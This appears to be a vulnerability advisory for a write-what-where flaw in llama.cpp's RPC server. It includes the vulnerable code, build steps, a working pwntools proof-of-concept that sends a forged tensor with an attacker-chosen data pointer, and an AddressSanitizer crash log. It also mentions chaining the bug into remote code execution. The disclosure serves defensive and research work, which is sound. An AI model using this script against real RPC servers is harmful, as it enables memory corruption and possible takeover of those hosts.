Write-what-where in rpc_server::set_tensor

Write-what-where in ggml_backend_cpu_buffer_get_tensor

Summary

The unsafe data pointer member in the rpc_tensor structure can cause arbitrary address writing.

Details

First, note that the data pointer membe in the rpc_tensor structure can be controlled by the user.

// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;
    uint32_t type;
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
#pragma pack(pop)

We can achieve arbitrary address writing during the following call by controlling the value of the data pointer.

The following is the function call chain that leads to arbitrary address writing:

[start_rpc_sercer](

llama.cpp/ggml/src/ggml-rpc.cpp

Line 1144 in 75af08c

    
           void start_rpc_server(ggml_backend_t backend, const char * endpoint, size_t free_mem, size_t total_mem) {

)

[rpc_serve_client](

llama.cpp/ggml/src/ggml-rpc.cpp

Line 1060 in 75af08c

    
           static void rpc_serve_client(ggml_backend_t backend, sockfd_t sockfd, size_t free_mem, size_t total_mem) {

)

[rpc_server::set_tensor](

llama.cpp/ggml/src/ggml-rpc.cpp

Line 893 in e31a4f6

bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {

)

[ggml_backend_tensor_set](

llama.cpp/ggml/src/ggml-backend.c

Line 221 in 400ae6f

    
           GGML_CALL void ggml_backend_tensor_set(struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {

)

[ggml_backend_cpu_buffer_set_tensor](

llama.cpp/ggml/src/ggml-backend.c

Line 577 in 400ae6f

    
           GGML_CALL static void ggml_backend_cpu_buffer_set_tensor(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {

)

GGML_CALL static void ggml_backend_cpu_buffer_set_tensor(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {
    memcpy((char *)tensor->data + offset, data, size);	//Write-what-where In here!
    GGML_UNUSED(buffer);
}

PoC

Build

git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && mkdir build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwn

Reproduce

In llama/llama.cpp/build-rpc/bin,Run this command:

./rpc-server -p 50052

Then run the following Python script:

from pwn import *

ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10

context(arch='amd64',log_level = 'debug')

p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_DEVICE_MEMORY)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
p.close()


p = remote("127.0.0.1",50052)

pd = b''
cmd = p8(GET_ALIGNMENT)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content

cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
remote_ptr = u64(recv[0x18:0x20])
sz = u64(recv[0x20:0x28])
log.success(f"remote_ptr:{hex(remote_ptr)},size:{sz}")
p.recvall(timeout=1)
p.close()

'''
When the vulnerability cannot be triggered, you might want to adjust the next_ptr variable in the script to the buffer address returned by ALLOC_BUFFER.
'''
next_ptr = remote_ptr + 0x160
log.success(f'next_ptr:{hex(next_ptr)}')


p = remote("127.0.0.1",50052)
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd = cmd + input_size + content
leak_address = remote_ptr + 0x90

#fake a rpc_tensor
rpc_tensor_pd = flat(
    {
        0: [
            0x1,  # id
            p32(2),  # type
            p64(next_ptr),  # buffer
            [  # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [  # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),  # op
            [p32(0)] * 16,  # op_params (corrected from 8 to 16)
            p32(0),  # flags
            [p64(0)] * 10,  # src
            p64(0),  # view_src
            p64(0),  # view_offs
            p64(0xdeadbeef),  # data
            'a' * 64,  # name
            'x' * 4  # padding
        ],
    }
)
cmd = p8(SET_TENSOR)
content = flat(
    {
        0: [rpc_tensor_pd + p64(0) + p64(0x100),
            b'a'*0x100]
    }
)
input_size = p64(len(content))
pd+= cmd + input_size + content

p.send(pd)
p.recv(0x18)
p.close()

It will be Write-what-where.

Asan log

➜  bin git:(master) ✗ ./rpc-server -p 50052
create_backend: using CPU backend
Starting RPC server on 0.0.0.0:50052, backend memory: 7896 MB
Accepted client connection, free_mem=8280244224, total_mem=8280244224
Client connection closed
[~socket_t] closing socket 4
Accepted client connection, free_mem=8280244224, total_mem=8280244224
[get_alignment] alignment: 32
[alloc_buffer] size: 256 -> remote_ptr: 60b000000300, remote_size: 288
Client connection closed
[~socket_t] closing socket 4
Accepted client connection, free_mem=8280244224, total_mem=8280244224
[alloc_buffer] size: 256 -> remote_ptr: 60b000000460, remote_size: 288
[set_tensor] buffer: 0x60b000000460, data: 0xdeadbeef, offset: 0, size: 264
=================================================================
==12636==ERROR: AddressSanitizer: unknown-crash on address 0x0000deadbeef at pc 0x7f320e63a2c3 bp 0x7ffc8dcfc8d0 sp 0x7ffc8dcfc078
WRITE of size 264 at 0x0000deadbeef thread T0
    #0 0x7f320e63a2c2 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
    #1 0x7f320e3464ea in rpc_server::set_tensor(std::vector<unsigned char, std::allocator<unsigned char> > const&) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x1464ea)
    #2 0x7f320e35765a in start_rpc_server (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x15765a)
    #3 0x573e32234c63 in main (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2c63)
    #4 0x7f320da29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #5 0x7f320da29e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #6 0x573e32234ff4 in _start (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2ff4)

Address 0x0000deadbeef is located in the shadow gap area.
SUMMARY: AddressSanitizer: unknown-crash ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
==12636==ABORTING

Impact

This vulnerability can be used as a primitive for arbitrary writes in an exploit. I used this vulnerability along with another arbitrary address read vulnerability to achieve RCE(Remote Command Execute), demonstrating the significant impact of the vulnerability. The RCE video is as follows:https://drive.google.com/file/d/1vuoxQblMJ7KcaH05Z_sk_ruHSN0ftKvz/view?usp=sharing

Credit

This vulnerability was discovered by 7resp4ss and Guang Gong from 360 Vulnerability Research Institute.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Write-what-where in rpc_server::set_tensor

Package

Affected versions

Patched versions

Description

Write-what-where in ggml_backend_cpu_buffer_get_tensor

Summary

Details

PoC

Build

Reproduce

Asan log

Impact

Credit

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits